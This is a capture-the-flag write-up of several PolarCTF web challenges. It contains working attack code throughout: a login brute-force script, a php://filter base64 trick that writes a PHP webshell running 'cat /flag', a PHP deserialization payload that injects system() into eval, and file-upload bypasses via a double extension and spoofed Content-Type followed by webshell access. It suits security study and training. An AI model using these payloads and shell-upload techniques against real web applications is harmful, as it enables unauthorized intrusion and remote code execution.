PoloarCTF WriteUp

PoloarCTF WriteUp

Web

login

import re
import requests

res = ""
url = "http://5077cb7c-84a4-4a16-84e9-8a4547f7efbc.www.polarctf.com:8090"
for i in range(2, 30):
  username = "202001{:02d}".format(i)
  password = "202001{:02d}".format(i)
  payload = {
    "username": username,
    "password": password,
    "submit": "Submit+Query"
  }
  resp = requests.post(url, data=payload)
  p = re.findall(r"[a-zA-Z0-9]+", resp.text[-10:])
  if len(p) != 0:
    res += p[0]

print(res)  # flag{dlcg}

写shell

参考: 关于<?php exit;?>"的绕过问题

import requests

res = ""
url = "http://d0b5be67-6278-429b-975b-8aa58e43c995.www.polarctf.com:8090"
params = { "filename": "php://filter/write=convert.base64-decode/resource=a.php" }
payload = { "content": "aPD9waHAgc3lzdGVtKCdjYXQgL2ZsYWcnKTsgPz4=" }
resp = requests.post(url, params=params, data=payload)
resp = requests.get(f"{url}/a.php")
res = resp.text
print(res)  # �^�+Zflag{30c42ede8bc4b32e2ae125afaeebee6f}

php very nice

反序列化时，会执行 __destruct() 函数。

<?php
 highlight_file(__FILE__);
 class Example
 {
     public $sys='Can you find the leak?';
     function __destruct(){
         eval($this->sys);
     }
 }
 $obj = new Example();
 $obj->sys = 'system("cat flag.php");';
 echo(serialize($obj));  # O:7:"Example":1:{s:3:"sys";s:23:"system("cat flag.php");";}
 ?>

import re
import requests

res = ""
url = "http://66237941-9198-4958-b406-f0d7ff7a947f.www.polarctf.com:8090"
params = { "a": "O:7:%22Example%22:1:{s:3:%22sys%22;s:23:%22system(%22cat%20flag.php%22);%22;}" }
resp = requests.get(url, params=params)
res = re.findall(r"flag{.*}", resp.text)
if len(res) != 0:
    print(res)  # flag{202cb962ac59075b964b07152d234b70}

upload

双写 php 后缀，修改 Content-Type: image/jpeg 绕过。

右键打开开发者工具，查看上传的文件路径，

<div id="img">
  <img src="upload/32284shell.php" width="250px">
</div>

蚁剑连接地址: http://725f1d90-bcf2-42ff-bb4d-f2fce9495d2c.www.polarctf.com:8090/upload/32284shell.php

(apache:/var/www/upload) $ cat /var/www/flag.php
<?php
$flag = 'flag{a89f40341f4271659154829a2215f428}';
?>

ezupload

修改 Content-Type: image/gif 绕过。

(apache:/var/www) $ cat /var/www/flag.php
<?php
    $flag = "flag{ffffffffllllaaggg_!!!}";